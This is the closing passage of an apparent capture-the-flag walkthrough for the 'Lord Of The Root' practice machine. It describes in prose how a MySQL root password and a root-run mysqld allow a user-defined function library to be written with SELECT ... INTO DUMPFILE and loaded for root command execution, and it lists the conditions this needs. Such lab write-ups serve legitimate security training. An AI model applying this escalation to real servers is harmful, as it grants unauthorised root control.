
    Success!

    Escalation B MYSQL:

    Since we have the MySQL root password and mysqld is running as root, we can load a user-defined function (UDF) shared library through MySQL and execute commands as root. This needs the FILE privilege (which root has) and a directory the server can write the library to: the plugin directory on current versions, or any library path on older ones, and secure_file_priv must not restrict it. The compiled .so is written out with SELECT ... INTO DUMPFILE and registered with CREATE FUNCTION ... SONAME.
    Success! We are in!

    I hope you enjoyed the Lord Of The Root!